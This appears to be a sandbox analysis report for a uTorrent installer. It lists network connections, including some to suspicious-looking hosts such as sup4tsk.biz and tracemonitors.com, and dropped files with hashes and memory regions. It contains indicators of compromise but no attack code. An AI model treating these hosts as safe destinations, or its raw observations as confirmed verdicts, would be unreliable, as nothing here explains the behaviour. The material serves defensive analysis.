US 172.67.169.157:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.132:443 s.go-mpulse.net tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
GB 2.18.108.132:443 c.go-mpulse.net udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
BR 186.216.44.222:50454 udp
FR 90.26.201.5:61142 udp
NL 95.211.135.119:30170 udp
US 8.8.8.8:443 dns.google udp
FR 178.32.197.48:443 www9.smartadserver.com tcp
FR 178.32.197.48:443 www9.smartadserver.com tcp
MY 175.143.74.73:34432 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
BR 45.162.129.154:47862 udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 154.129.162.45.in-addr.arpa udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.132:443 s.go-mpulse.net tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
US 8.8.8.8:53 ae.mmstat.com udp
US 8.8.8.8:53 ae.mmstat.com udp
GB 163.181.154.244:443 bottom.campaign.aliexpress.com tcp
GB 95.100.244.36:443 ae01.alicdn.com udp
SG 47.246.110.42:443 ae.mmstat.com tcp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
DE 47.246.146.126:443 acs.aliexpress.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
GB 217.44.73.79:43558 tcp
NI 190.212.57.206:30195 udp
US 104.222.16.99:57190 tcp
US 185.208.158.202:80 bbeeeki.com tcp
MX 177.227.56.184:47262 udp
US 8.8.8.8:53 184.56.227.177.in-addr.arpa udp
CN 114.227.158.87:56009 udp
US 8.8.8.8:53 video.rainberrytv.com udp
FR 178.32.197.48:443 www9.smartadserver.com tcp
FR 178.32.197.48:443 www9.smartadserver.com tcp
US 47.202.25.41:50321 udp
US 8.8.8.8:53 41.25.202.47.in-addr.arpa udp
US 8.8.8.8:53 i-38.b-47142.ut.bench.utorrent.com udp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
FR 178.32.197.48:443 www9.smartadserver.com tcp
FR 178.32.197.48:443 www9.smartadserver.com tcp
US 38.114.114.245:26071 udp
US 8.8.8.8:53 245.114.114.38.in-addr.arpa udp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
MX 205.164.194.133:46728 udp
FR 178.32.197.48:443 www9.smartadserver.com tcp
FR 178.32.197.48:443 www9.smartadserver.com tcp
TW 122.116.184.60:34344 udp
AR 181.89.93.245:54194 udp
US 8.8.8.8:53 245.93.89.181.in-addr.arpa udp
US 172.234.222.138:80 torrentclub.tech tcp
US 172.234.222.143:80 torrentclub.tech tcp
US 8.8.8.8:443 dns.google udp
GB 216.58.212.227:443 update.googleapis.com tcp
IQ 185.181.109.197:50540 udp
US 8.8.8.8:53 197.109.181.185.in-addr.arpa udp
GB 216.58.212.227:443 update.googleapis.com udp
RU 89.222.152.46:49001 udp
US 8.8.8.8:53 46.152.222.89.in-addr.arpa udp
N/A 10.127.0.42:50993 tcp
US 8.8.8.8:443 dns.google udp
FR 164.132.25.176:443 www9.smartadserver.com tcp
FR 164.132.25.176:443 www9.smartadserver.com tcp
GB 23.214.143.155:80 api.steampowered.com tcp
NL 89.105.201.183:2023 tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
GY 190.80.34.76:10816 udp
US 146.70.173.160:62801 tcp
IL 77.127.148.202:6881 udp
US 146.70.172.32:62801 tcp
GB 86.14.104.109:6889 udp
US 54.167.59.98:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 54.167.59.98:80 i-38.b-47142.ut.bench.utorrent.com tcp
GB 23.214.143.155:80 api.steampowered.com tcp
NL 89.105.201.183:2023 tcp
GY 190.80.34.0:45817 udp
US 34.111.113.40:443 config.uca.cloud.unity3d.com tcp
GB 2.19.252.157:80 www.msftncsi.com tcp
US 8.8.8.8:53 157.252.19.2.in-addr.arpa udp
BR 201.19.24.3:52319 udp
RU 178.141.244.80:3442 udp
US 34.111.113.40:443 config.uca.cloud.unity3d.com tcp
GB 2.19.252.157:80 www.msftncsi.com tcp
CO 181.55.20.201:8786 udp
IN 223.186.25.197:4176 udp
US 8.8.8.8:53 197.25.186.223.in-addr.arpa udp
US 8.8.8.8:53 www.rapidfilestorage.com udp
US 44.226.34.177:443 api.check-data.xyz tcp
KZ 185.22.66.16:80 www.rapidfilestorage.com tcp
KZ 185.22.66.16:80 www.rapidfilestorage.com tcp
RU 80.78.240.92:80 rfiles4.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles4.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles4.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles4.tracemonitors.com tcp
RU 194.67.103.130:443 x-finder.pro tcp
RU 194.67.103.130:443 x-finder.pro tcp
GB 95.100.245.51:443 store.steampowered.com tcp
GB 95.100.245.51:443 store.steampowered.com tcp
US 8.8.8.8:53 130.103.67.194.in-addr.arpa udp
GB 142.250.178.14:443 clients2.google.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
US 151.101.195.52:443 shared.fastly.steamstatic.com tcp
US 151.101.3.52:443 shared.fastly.steamstatic.com tcp
US 151.101.3.52:443 shared.fastly.steamstatic.com tcp
US 151.101.3.52:443 shared.fastly.steamstatic.com tcp
US 151.101.3.52:443 shared.fastly.steamstatic.com tcp
US 151.101.3.52:443 shared.fastly.steamstatic.com tcp
US 151.101.3.52:443 shared.fastly.steamstatic.com tcp
AR 186.22.18.240:14839 udp
GB 95.100.245.51:443 store.steampowered.com tcp
GB 95.100.245.51:443 store.steampowered.com tcp
US 8.8.8.8:53 api4.tracemonitors.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
NL 89.105.201.183:2023 tcp
US 44.226.34.177:443 api4.tracemonitors.com tcp
US 151.101.195.52:443 cdn.steamstatic.com tcp
US 151.101.195.52:443 cdn.steamstatic.com tcp
NL 45.87.251.132:28096 udp
PL 89.64.37.131:62583 udp
US 151.101.195.52:443 cdn.steamstatic.com tcp
RU 130.255.36.166:2079 udp
GB 88.221.135.105:80 r11.o.lencr.org tcp
US 151.101.195.52:443 cdn.steamstatic.com tcp
US 151.101.195.52:443 cdn.steamstatic.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\System.dll

MD5 cff85c549d536f651d4fb8387f1976f2
SHA1 d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
SHA256 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
SHA512 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\bt_datachannel.dll

MD5 dfca05beb0d6a31913c04b1314ca8b4a
SHA1 5fbbccf13325828016446f63d21250c723578841
SHA256 d4c4e05fade7e76f4a2d0c9c58a6b9b82b761d9951ffddd838c381549368e153
SHA512 858d4fb9d073c51c0ab7a0b896c30e35376678cc12aec189085638376d3cc74c1821495692eac378e4509ef5dcab0e8b950ad5bfab66d2c62ab31bc0a75118cf

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\nsisFirewall.dll

MD5 f5bf81a102de52a4add21b8a367e54e0
SHA1 cf1e76ffe4a3ecd4dad453112afd33624f16751c
SHA256 53be5716ad80945cb99681d5dbda60492f5dfb206fbfdb776b769b3eeb18d2c2
SHA512 6e280a75f706474ad31b2ce770fa34f54cb598528fac4477c466200a608b79c0f9b84011545595d9ba94331ad08e2f51bd42de91f92379db27686a28ba351256

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\INetC.dll

MD5 640bff73a5f8e37b202d911e4749b2e9
SHA1 9588dd7561ab7de3bca392b084bec91f3521c879
SHA256 c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502
SHA512 39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe

MD5 b7f8a3909ad963d5b5260dacfa897e6e
SHA1 030ed1e99cb6d681dadca6068caf194bf67580e9
SHA256 8837428a93c7ee46b9772d6c857e109e9baa0f5b28450f87fff7c0e8b87cf017
SHA512 42569e974ef38ddea3300c6d82fd5e371c3cff8bdb04311c6bf3d94727fc37c5ef223ad07198ca2e499528a1671593ea6ef2bf3000611dbda49ca0a0c59c6bb4

memory/3132-35-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\utorrent\settings.dat.old

MD5 56b5537a597d3d8ef245eb221a1fecd8
SHA1 7781619c765c30363369676a8cd959ba27c9643c
SHA256 6ef8a78dcd76e0f91a95d0d3b8d298a9ce0df5a5b7ac1350fd958e2041ce6f8e
SHA512 60fcc8992f62f7b7c90aa60332f45ae4e09e114d25e69f6bbd9a8f2fbde58e87f1b3479366269028d614c181eb5b9ad4f7b0a6dbae6683a99124556a9bc26ac6

C:\Users\Admin\AppData\Roaming\utorrent\toolbar.benc.new

MD5 aeee649704374e873627d801cd519ce0
SHA1 40bd813e8daba94272cfe877d770a1aa2e9cc293
SHA256 b38a11c2f6b49cbec65a537274e3d9466f5a85570568a82614241b41a43987a0
SHA512 ac826097ff2e73c3ab2793a81fb69295d7ee2b3e367de16495e6dddc3edb16676206c5182da586b339f3fa420efb678e2db3c5d864a76b0c359c4b2df0e1480b

memory/3132-61-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/3132-62-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/3132-63-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/3132-64-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\utorrent\settings.dat.old

MD5 69aa54d667e0b89b2eaea2d065e3f0e2
SHA1 2356dbe670d0be5b9b5e5b0f7e9f0df8db3313a0
SHA256 4dc9d880df852695d44e762fb3e8e8d48f9f15f9bdf6bfdd819cae34f6deb682
SHA512 f6c1e11c4c7f397f17a22ac7f7b7bc00f87e12ac718643ac14f4d685ffb889c85d7aa6af338a01872253c27f53c1f35446198b629248a4773aa8d7b856aa82ec

memory/2008-90-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/3132-92-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\uTorrent\settings.dat

MD5 8bea4c343900bd217f887777e5305b14
SHA1 e370f4db3c5f1467d88a67b5d7c5560d6f5be174
SHA256 a9176b77f7274d6cd59b19ca890db19f8535a0bcb46bbde31b76dc07e8d6f377
SHA512 af586f424a1fd3578c39046342f2db175c42071f29f3d5a3b4e98faf4370618dd6abe0376988620d753d0189ab5e9a28d7ba1d5d5bd4b1db031e045c45cf636d

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3870231897-2573482396-1083937135-1000\1f91d2d17ea675d4c2c3192e241743f9_27b06f29-58d3-4ff3-b1fc-f519e4e4f0ec

MD5 060c222ab58ac8b3d973cab120990b03
SHA1 db16e6c7c7918f38cf994232ff66a82aac27c5f1
SHA256 6d1303ca42f13823da55cf55a272821e97e5677967ba8bf24af178a2adb29ec1
SHA512 bfe07c4f339916c2dc5afd7d648ce5af6acfa429d9685f30b0a107be6ae25d8fbab9d3c895145819cee4a7b2989dc791d8de44790c5a8f93c0dec97bf6c61458

C:\Users\Admin\AppData\Roaming\uTorrent\updates.dat

MD5 2cc08ee7189af097ed1c4b3910158dc4
SHA1 3b592c36c48babb2e2e9c0f94427dc6b1895620a
SHA256 ea5b7e41a52bc08867bb4cbd4cc54f2fb38856372cec8967f1bd6f20cf1959cc
SHA512 1695aa3f6dd93731e0e18e6d7f01bf3c960cd157d4b0af239d0c4e2a2ea626eb91285323c6785b1857c895ec091fd916d2b9b258f41023302da1c7ef7cb6b0a1

C:\Users\Admin\AppData\Roaming\utorrent\updates\3.6.0_47142\utorrentie.exe

MD5 cb7beaf76d79ccc4d91d043419ec3661
SHA1 6952a0600d07c65f023e7a33cc1f9e9e8bd426b3
SHA256 ab5fb8587d7ec8dd8e9ea9e69d8a8695bb165f44fe1d07f0f7df1ace5203d552
SHA512 cbf6e27909f7ae5798154e9a5138bf4fa14f42504593f7918563b81178d4b15dec1649ae43d9fcef062980b05f6024b953d09796419f8ce28f79fc27e6453363

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad\settings.dat

MD5 e8d87151a02ac64a0a513b1a4ff344d5
SHA1 515e71d8297e42299676a1bf8d47a626affa6e64
SHA256 396dda168726a16612e0709a029846ca605153f39392ad81cf1bd8636e2c3af5
SHA512 5fb6b4e018baa8be369d705fe0a74baf9492535844865905239593479095446e294e8a7415ce5c4542be7113b99c7fe1aaa0ab39ca6d3adf8ee0f39a5fe57f99

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad\settings.dat

MD5 46de5f04e231ddb5df3e575ea9f391cc
SHA1 1ada87fb6ac435fd0a22ed2d84e6a83e53b5de0c
SHA256 401d5113252ca3852bc78deddcdafb0c838314888fd9c030f54b98a043f8e1dd
SHA512 5a5669aac0c9ff77ba7b6fb9666870714ecc7db2983588b26401cd35b45078ba20618ac09868ef2c02956474f2261e454c6af3d325cd0152cc2d078b81712c76

\??\pipe\LOCAL\crashpad_1992_DEXCOIOLTERKAKBE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2108-177-0x00007FFFEAD30000-0x00007FFFEAD31000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 549f7151a780973b1ceb1d7c06a0d63c
SHA1 3ee065e33bee89fbc66317972278735aeb1acdc0
SHA256 03a85329fff9a33db4615e50f769b9f57f58c02038e58d7761852a8edfa2e95b
SHA512 9674e267be3d2468391326635f203412b7d8967b33e508eaf62f6497a178ccb8fb5bdc6cae874f0a575b75b5568bf6a438d2ec92bba3555c076673a66ff96314

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 1bf7986ecf0333a7eb31ea9405cf08e1
SHA1 eb5806a1ebb64944815e4d1ba8d911e81a535bf4
SHA256 8f1bac98797c9cdd5785fa72dab5092c6206c379c0da4170b8a819dc92ec34fe
SHA512 bb32dc03ae0206ae5759e6c782b76b1f59db18f416d3a092002f2afc445b7a1f2b4e97f76ec6b6a291b4fe1e1bed50b447927cfaa23758443d3a6d57b47ad67d

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad\settings.dat

MD5 84e01812d853821ebe4bf60699893e51
SHA1 7de788010156ddc3ee7eedea2db69be142122c37
SHA256 d6c2cd8f2da9e9df981fb649c1b588ca555848c597452e2f4edcc10664079222
SHA512 422e5ffe4ad281a3bb81126dc4fe53a06b0ef605d2e82245b9d30dcb5586083c0dfbcf577f2e0ccbd359299f6bb7829844b226e8aa2b347a3f286fc90d1402d9

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 6a6c95fe93101e4e549811434cc88303
SHA1 6355b8c84dd965fb9900f72225ce12da5c2c71d4
SHA256 a560764eaf6ad95cb04ad4a423aea4c00fb6ee6c11e9eb07c36b2c981844c31a
SHA512 4660d566ed8743d7126ced6f0a2dbf80b6a7c62ef734b9b0fbad32231a91303582bc038cb764890a7a6687b0c808373fcd1e8b534f5260bae7da5fd40df1c181

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c03d23a8155753f5a936bd7195e475bc
SHA1 cdf47f410a3ec000e84be83a3216b54331679d63
SHA256 6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA512 6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d68c7edc2a288ee58e6629398bb9f7c
SHA1 6c1909dea9321c55cae38b8f16bd9d67822e2e51
SHA256 dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b
SHA512 0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4225f9df67bc6d6305d279fca1cc0e95
SHA1 81025b67c14273b1206f94c82c47d544b2f24e7e
SHA256 f796ba2cdc51dc7a09e1b3e993e04b15f8b81b4b9c2758b77a76e839bc8dc1fd
SHA512 7b53d6b02cf9969e03072ff163afc946a22d908b9e95ad6a66bce23626b48e562ba594d15ad58b0dfa00d69d26f962f41df38e5d6509256f3995c55e73acd464

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

MD5 d463c4cceb81509cff7f93e8263cce1d
SHA1 a1b4aef43fcdc39b31f8c3bd2172d43ea12c2923
SHA256 6f2fbd501b9638f80152e84a3f0ca89ab083ed87a8a9da84e121a54b1df4ae60
SHA512 36de60ffe124cb7de1bf3dcf4f6d7fe75cc794ed2d90afb382690c63ecf8dc2206b2582824d0750e14d7e3b26fba7e140564a3b761f37cc7ef72dc50b73afb5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

MD5 28895bd8818b2b2fca7f2a58b1ca4ced
SHA1 335ee5e60317fff1124698e14cb479563b793408
SHA256 d3eb7da955e8d725e474e0ccef85315447bcdb9d36ade9874bd4324756b159e4
SHA512 8d65f4aeb12811868412fac429f8a82ccc94aa7699a4bfbe1d7048a951831abcbfd9fde284d84e8895ec1788f67e0685fba03e925b12a55e6ac0c96b3be12124

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\GrShaderCache\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\GrShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\GrShaderCache\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\GrShaderCache\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

memory/2108-393-0x0000022A9F0B0000-0x0000022A9F11F000-memory.dmp

memory/1640-394-0x0000020A1CB10000-0x0000020A1CB7F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 87e8230a9ca3f0c5ccfa56f70276e2f2
SHA1 eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7
SHA256 e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9
SHA512 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

C:\Users\Admin\Desktop\µTorrent.lnk

MD5 0d42f3a2ea653d5431d36a9ce8fe23fb
SHA1 ce6693c1e31aa8c2e9aa81bd719b1f344f8c40a9
SHA256 aa0d7582e064e7fd9b6980c0c860c87230a73814a6ec946d3967735e6d41f31c
SHA512 4a5bd566b8c8709d00e09ad0e9db0a9c248332f4f4b4afa63958838e19dcd3a0906e2f7817066287e4aeb6bd784eb2b48ff5243450c85b1220d164c136861889

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

memory/2980-558-0x00007FFFEAC60000-0x00007FFFEAC61000-memory.dmp

memory/2980-559-0x00007FFFEA460000-0x00007FFFEA461000-memory.dmp

memory/2008-562-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/2008-561-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 8d524b468971edea1e51763d2b1a579f
SHA1 2b53d73d5c590befaa1b1c7458c11db6e4ce0a45
SHA256 598fcdfbcad78d5885548043b4a690babd6b52b281d94e4c99a9386ba8fc7c19
SHA512 e9da3f970b47bd8596dc65c3f8cfa3f80efefa5a1de3963427946b029431b3ba557ec4c3a34ba81b6489a1031fda31803282e878f43647f1753ee5211e5aee64

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 bd5434f1fb063882f008bd779113a616
SHA1 f57c4d0d16ace2ceeede564ce037ddf7f7d40199
SHA256 9ab1a4b363a64f95fbc68266789cbac3d5c1e212ce4ab69891a2118b2e3e8509
SHA512 d2267a27b7eb541c3423f05026774bb465f0423eb885ca361a19853fe07027b722b53de545e43573127f237593c02fdad9c3cafb60d82b53a84661c0fe552540

memory/5060-689-0x0000026D6EF80000-0x0000026D6EFEF000-memory.dmp

memory/764-690-0x000001ECE2BA0000-0x000001ECE2C0F000-memory.dmp

memory/5184-699-0x000002136B4E0000-0x000002136B54F000-memory.dmp

memory/5216-766-0x000001F439E60000-0x000001F439ECF000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_000010

MD5 d4141c2722d08cfa132fe537ece49f64
SHA1 8a97c1f278e1581c8f638235c32ca6ca00d6e318
SHA256 980e5e4c8e485cbb861559c9fe15c3b19a1832f29232cbdfdbabfd0bf6b351b8
SHA512 fb8ba7dd9ca9dfc62c7c377c64bc5bd4c64d7c9efcfd2c7276ffc3568fa70b7a9dc534bfccc1b46fa9a89e458066854f60903aa689bb840ec2c32bad418dc4a1

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_000013

MD5 17afdfcf738143362ce56f2f5e764296
SHA1 31b5352513d6749c476670c39bd4d02aede9e825
SHA256 b954fdd162dad834304e37e54a2aa23893a67ad6768f68849815ba4ec1dddcc0
SHA512 60f73f10ba89178cbeccdd142b06da7b8fa5c76c287e7e008668174512fa2385feecca1fc9b37c1ef123f1fcc969b226fda98f45e91428fbfaddd2f3de7d9bc9

memory/5208-791-0x000001C71EAE0000-0x000001C71EB4F000-memory.dmp

memory/5320-792-0x000001555B090000-0x000001555B0FF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 49b3267f8fa5eb4b16de73bfcbc9a8e0
SHA1 2411d475753bc42816a081c1bd68ed685f5f98cf
SHA256 799720138dae2bb1404cccbe5ae98936d38899d908a5cf14bd5d124dadc21908
SHA512 553b522e63287af0146c78824bbb569ca4cc0bcc9f92bc9a52c5705707efcf202e14e171b284d4135447fb10f30cd4ffdda1e3c1cf35f036424295202e4ecb02

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_000001

